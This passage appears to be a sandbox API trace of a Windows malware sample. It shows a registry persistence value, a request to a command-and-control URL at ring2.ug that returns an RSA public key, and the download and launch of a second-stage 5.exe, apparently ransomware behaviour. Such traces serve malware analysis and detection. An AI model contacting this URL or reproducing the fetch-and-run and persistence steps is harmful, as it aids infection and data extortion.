| out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.934] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.934] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x400) returned 1 [0077.935] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x400, lpOverlapped=0x0) returned 1 [0077.935] CloseHandle (hObject=0x6b8) returned 1 [0077.961] InternetCloseHandle (hInternet=0xcc0024) returned 1 [0078.032] InternetCloseHandle (hInternet=0xcc001c) returned 1 [0078.032] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\5.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0078.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x759860 | out: hHeap=0x680000) returned 1 [0078.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0078.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x318a170 | out: hHeap=0x680000) returned 1 [0078.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315efb0 | out: hHeap=0x680000) returned 1 [0078.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d68 | out: hHeap=0x680000) returned 1 [0078.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175870 | out: hHeap=0x680000) returned 1 [0078.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0078.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f368 | out: hHeap=0x680000) returned 1 [0078.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f2f8 | out: hHeap=0x680000) returned 1 [0078.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f170 | out: hHeap=0x680000) returned 1 [0078.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f100 | out: hHeap=0x680000) returned 1 [0078.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3134ff0 | out: hHeap=0x680000) returned 1 [0078.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0078.106] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31818f8 | out: hHeap=0x680000) returned 1 Thread: id = 43 os_tid = 0x8b0 [0073.349] timeGetTime () returned 0x115905d [0073.350] GetLastError () returned 0x54f [0073.350] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x3bc) returned 0x3173088 [0073.373] GetCurrentThreadId () returned 0x8b0 [0073.373] SetLastError (dwErrCode=0x54f) [0073.373] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0xfbca5e4 | out: phkResult=0xfbca5e4*=0x5e4) returned 0x0 [0073.373] RegQueryValueExW (in: hKey=0x5e4, lpValueName="SysHelper", lpReserved=0x0, lpType=0xfbca5d8, lpData=0xfbca5e0, lpcbData=0xfbca5dc*=0x4 | out: lpType=0xfbca5d8*=0x0, lpData=0xfbca5e0*=0x0, lpcbData=0xfbca5dc*=0x4) returned 0x2 [0073.373] RegSetValueExW (in: hKey=0x5e4, lpValueName="SysHelper", Reserved=0x0, dwType=0x4, lpData=0xfbca5e0*=0x1, cbData=0x4 | out: lpData=0xfbca5e0*=0x1) returned 0x0 [0073.374] RegCloseKey (hKey=0x5e4) returned 0x0 [0073.374] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xfbca4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0073.374] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0073.374] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c3a8 [0073.375] AreFileApisANSI () returned 1 [0073.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfbca4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0073.375] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7a) returned 0x6deef8 [0073.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfbca4e4, cbMultiByte=-1, lpWideCharStr=0x6deef8, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0073.382] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xfbca368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.427] GetLastError () returned 0x2 [0073.427] GetLastError () returned 0x2 [0073.427] SetLastError (dwErrCode=0x2) [0073.427] GetLastError () returned 0x2 [0073.427] SetLastError (dwErrCode=0x2) [0073.427] GetLastError () returned 0x2 [0073.428] SetLastError (dwErrCode=0x2) [0073.437] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0073.437] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0073.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x759728 [0073.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8e) returned 0x72b058 [0073.438] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x759728 | out: hHeap=0x680000) returned 1 [0073.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f090 [0073.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x3171760 [0073.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x315f090, cbMultiByte=-1, lpWideCharStr=0x3171760, cchWideChar=1056 | out: lpWideCharStr="22A0B9E5C760B281DCD5CB49BC3A474C") returned 33 [0073.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x850) returned 0x316ccb8 [0073.438] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3171760 | out: hHeap=0x680000) returned 1 [0073.438] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x315f090 | out: hHeap=0x680000) returned 1 [0073.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x3171760 [0073.438] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x72b058 | out: hHeap=0x680000) returned 1 [0073.438] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ccb8 | out: hHeap=0x680000) returned 1 [0073.438] lstrcpyW (in: lpString1=0xfbcaf78, lpString2="http://ring2.ug/Asjdi435784ihjk65pen2/get.php?pid=22A0B9E5C760B281DCD5CB49BC3A474C" | out: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php?pid=22A0B9E5C760B281DCD5CB49BC3A474C") returned="http://ring2.ug/Asjdi435784ihjk65pen2/get.php?pid=22A0B9E5C760B281DCD5CB49BC3A474C" [0073.438] lstrcatW (in: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php?pid=22A0B9E5C760B281DCD5CB49BC3A474C", lpString2="&first=true" | out: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php?pid=22A0B9E5C760B281DCD5CB49BC3A474C&first=true") returned="http://ring2.ug/Asjdi435784ihjk65pen2/get.php?pid=22A0B9E5C760B281DCD5CB49BC3A474C&first=true" [0073.438] InternetOpenUrlW (hInternet=0xcc0010, lpszUrl="http://ring2.ug/Asjdi435784ihjk65pen2/get.php?pid=22A0B9E5C760B281DCD5CB49BC3A474C&first=true", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0018 [0074.136] InternetReadFile (in: hFile=0xcc0018, lpBuffer=0xfbca778, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xfbca604 | out: lpBuffer=0xfbca778*, lpdwNumberOfBytesRead=0xfbca604*=0x22d) returned 1 [0074.137] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xfbca670 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0074.138] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0074.138] AreFileApisANSI () returned 1 [0074.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfbca670, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0074.138] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7a) returned 0x6df118 [0074.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfbca670, cbMultiByte=-1, lpWideCharStr=0x6df118, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0074.138] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0xfbca47c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3b4 [0074.139] GetFileType (hFile=0x3b4) returned 0x1 [0074.139] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df118 | out: hHeap=0x680000) returned 1 [0074.139] lstrlenA (lpString="{\"public_key\":\"-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 557 [0074.139] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1000) returned 0x31d40e8 [0074.140] WriteFile (in: hFile=0x3b4, lpBuffer=0xfbc9118*, nNumberOfBytesToWrite=0x22d, lpNumberOfBytesWritten=0xfbc8a44, lpOverlapped=0x0 | out: lpBuffer=0xfbc9118*, lpNumberOfBytesWritten=0xfbc8a44*=0x22d, lpOverlapped=0x0) returned 1 [0074.141] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d40e8 | out: hHeap=0x680000) returned 1 [0074.141] CloseHandle (hObject=0x3b4) returned 1 [0074.142] InternetCloseHandle (hInternet=0xcc0018) returned 1 [0074.143] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0074.143] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3171760 | out: hHeap=0x680000) returned 1 [0074.144] lstrlenA (lpString="{\"public_key\":\"") returned 15 [0074.144] lstrcpyA (in: lpString1=0xfbcab78, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" [0074.144] lstrcpyA (in: lpString1=0xfbca778, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" [0074.144] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.144] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.144] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.144] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.144] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.144] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.144] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.144] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.144] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.144] lstrlenA (lpString="-----BEGIN PUBLIC 